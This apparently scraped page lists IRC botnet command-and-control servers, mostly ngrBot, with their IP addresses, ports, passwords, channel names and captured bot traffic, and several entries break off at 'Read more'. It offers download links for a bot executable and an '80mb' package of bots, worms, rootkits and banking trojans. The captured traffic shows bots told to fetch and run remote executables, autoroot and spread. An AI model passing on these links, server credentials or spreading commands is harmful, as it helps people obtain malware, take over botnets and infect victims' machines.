looks like fubar and jam3s are developing this lame bot in private now the version 1.3 have diferent update and spreading commands the code here is given to bots in .txt file with list of commands to be executed from the bot u can download the exe file from links below link1: http://02a4bc0e.urlbeat.net link2: http://59b97c61.urlbeat.net
109.68.191.166(ngrBot hosted in Russian Federation Moscow Jsc Tel Company)
Remote Host Port Number 109.68.191.166 1234 PASS xxx 173.245.60.21 80 212.7.214.59 80 216.178.39.11 80 63.135.80.224 80 72.21.91.19 80 NICK NEW-[USA|00|P|72548] USER XP-8030 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|72548] -ix JOIN #!nw! test PONG 22 MOTD hosting infos: http://whois.domaintools.com/109.68.191.166
80mb malware samples
This package contains alot of irc bot samples,worms like fworm etc,email spreaders,rootkits and banking trojans have fun Download: http://c45d041d.urlbeat.net
a.xludakx.com(ngrBot hosted in France Paris Gandi around 80k)
Very big irc botnet now for rent and hosted in france Resolved : [a.xludakx.com] To [92.243.27.72] 92.243.27.72 5900 leaf nr4 92.243.17.156 5900 resolved [b.xludakx.com] to (92.242.140.48) resolved [c.xludakx.com] to (92.242.140.48) resolved [d.xludakx.com] to (92.242.140.48) Remote Host Port Number 199.15.234.7 80 92.243.26.81 80 PASS ngrBot 92.243.26.81 3212 92.243.20.57 80 leaf nr2 Resolved : [haso.dukatlgg.com] To [92.243.27.178]Read more...
139.91.102.101(irc botnet hosted in Greece Foundation Of Research And Technology Hellas)
Remote Host Port Number 139.91.102.101 9595 PASS weed JOIN #VN# junglist USERHOST [00|USA|XP|SP2]-3905 MODE [00|USA|XP|SP2]-3905 +x NICK [00|USA|XP|SP2]-3905 USER hcyv 0 0 :[00|USA|XP|SP2]-3905 PONG :2FEDAA4A hosting infos: http://whois.domaintools.com/139.91.102.101
64.32.28.18(irc botnet hosted in United States Huntington Beach Sharktech Internet Services)
Remote Host Port Number 64.32.28.18 6667 PONG irc.insom.org JOIN #vnc# rage PRIVMSG #vnc# : 14,1.:[ 15,1rAGEBoT 14,1]:. 15,1 range: 201 with 100 threads. (autorooting) 15,1 p2p spread started. 15,1 rarworm activated. hosting infos: http://whois.domaintools.com/64.32.28.18
i.trizztal.info(ngrBot hosted in Russian Federation Moscow Oao Webalta)
i.trizztal.info 92.241.165.133 Remote Host Port Number 199.15.234.7 80 92.241.165.133 1863 PASS ngrBot NICK n{US|XPa}hozcoie USER hozcoie 0 0 :hozcoie Now talking in #start Topic On: [ #start ] [ *mdns http://policlinicodelsur.com/ostia.txt *msn.int # *msn.set jajajajajajajajajjajajaja viste esto? lol http://bit.ly/qZLzx8?/############/******/animacion ] Topic By: [ z3r0fr3ak ] files used to spread malware: http://adf.ly/3CnwR UPDATE: Remote Host PortRead more...
91.121.115.74(irc botnet hosted in France Ovh Systems)
Remote Host Port Number 67.205.76.102 6667 91.121.115.74 6667 NICK [MW]-XDCC-MOV88 MODE [MW]-XDCC-MOV880 +iBxpTW PRIVMSG nickserv :IDENTIFY 3013723 NOTICE SecureServ : VERSION MaSTeRWaReZ-v1 3.27 (Win32) 1.7.9, http://MaSTeRWaReZ-v1.net/ – geoip,upnp,gnutls,ruby USER NoT 32 . :NoT PING doubledown.trolol.net JOIN #MASTERWAREZ PRIVMSG #MASTERWAREZ :!voiceme NICK [MW]-XDCC-MOV880 PONG :B28F6F42 PONG :A4A05D7C NOTICE IRC : NOTICE DaggeredAngel : PING Unstable.AlphaIRC.com hostingRead more...
61.153.224.178(irc botnet hosted in China Zhejiang Jiaxing Telecom Co. Ltd Value-added Business Department)
Remote Host Port Number 208.83.20.130 6667 61.153.224.178 8000 NICK jtqlcmy USERHOST jtqlcmy NICK :birkd SILENCE +*,~*!*@*undernet.org MODE jtqlcmy +i ISON adi adrian adryan ady cristi cristian cristy demon devil luci lucian ru sebastian sebi vasi vasy }{ USER epekfh “” “208.83.20.130” :YthcpQrg MODE birkd +wxi NICK oouod USER xhuyn “” “208.83.20.130” :Woozcy PONG :3859371153 USERHOSTRead more...
sean06.com(ngrBot hosted in Canada Zenkis.ca)
Resolved : [sean06.com] To [72.55.132.189] Remote Host Port Number 195.78.76.16 80 199.15.234.7 80 72.55.132.189 5794 PASS ngrBot NICK n{US|XPa}purvgtk USER purvgtk 0 0 :purvgtk JOIN #chan ngrBot PRIVMSG #chan :[d=”http://www.flashgames-community.com/_server/video/1asdfasupdpelugay.exe” s=”116746 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 * The data identified by the following URLs was then requested fromRead more...